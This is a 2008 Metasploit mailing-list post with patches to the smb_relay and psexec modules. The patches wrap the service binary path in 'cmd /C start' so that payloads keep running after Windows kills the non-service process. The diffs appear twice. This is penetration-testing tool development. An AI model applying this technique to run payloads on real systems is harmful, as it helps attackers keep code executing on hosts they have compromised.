The problem with running payloads under smb_relay and psexec is that Windows expects them to be services, which they aren't. Windows expects services to respond to calls to start, stop, give a status, etc, and none of the payloads obviously do that. Therefore, when we start a service, Windows asks the application for a status; when it doesn't get it, it terminates the application.
But the application does run for a few seconds, so the solution is to simply invoke the application on its own rather than within a service. Once that's done, the application will be running in memory as a standalone and the fact that a service started it is not a problem. At first, I thought this would require building a special launcher application, but then I remembered windows already has one. Simply change: NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path to: NDR.wstring("cmd /C start %SYSTEMROOT%\\#{filename}") + # Binary Path This invokes a command shell which executes the start command. Windows immediately terminates the cmd shell and returns an error, but it has already run "start 'payload'", invoking the app in its own right. The two main problems I see with this: 1) You now have somewhat of a trigger for IDS (creating services with bin_paths starting with "cmd /C start" can't be common) 2) It still doesn't clean up after itself. But, if you find this useful anyway, here are the patches: --- smb_relay.rb.old 2008-07-02 17:03:16.000000000 +0000 +++ smb_relay.rb 2008-07-02 17:07:32.000000000 +0000 @@ -180,7 +180,7 @@ NDR.long(0x00000003) + # Start: Demand NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path + NDR.wstring("cmd /C start %SYSTEMROOT%\\#{filename}") + # Binary Path NDR.long(0) + # LoadOrderGroup NDR.long(0) + # Dependencies NDR.long(0) + # Service Start --- psexec.rb.old 2008-07-02 17:08:46.000000000 +0000 +++ psexec.rb 2008-07-02 17:09:14.000000000 +0000 @@ -164,7 +164,7 @@ NDR.long(0x00000003) + # Start: Demand NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path + NDR.wstring("cmd /C start %SYSTEMROOT%\\#{filename}") + # Binary Path NDR.long(0) + # LoadOrderGroup NDR.long(0) + # Dependencies NDR.long(0) + # Service Start
--- psexec.rb.old 2008-07-02 17:08:46.000000000 +0000 +++ psexec.rb 2008-07-02 17:09:14.000000000 +0000 @@ -164,7 +164,7 @@ NDR.long(0x00000003) + # Start: Demand NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path + NDR.wstring("cmd /C start %SYSTEMROOT%\\#{filename}") + # Binary Path NDR.long(0) + # LoadOrderGroup NDR.long(0) + # Dependencies NDR.long(0) + # Service Start
--- smb_relay.rb.old 2008-07-02 17:03:16.000000000 +0000 +++ smb_relay.rb 2008-07-02 17:07:32.000000000 +0000 @@ -180,7 +180,7 @@ NDR.long(0x00000003) + # Start: Demand NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path + NDR.wstring("cmd /C start %SYSTEMROOT%\\#{filename}") + # Binary Path NDR.long(0) + # LoadOrderGroup NDR.long(0) + # Dependencies NDR.long(0) + # Service Start
_______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers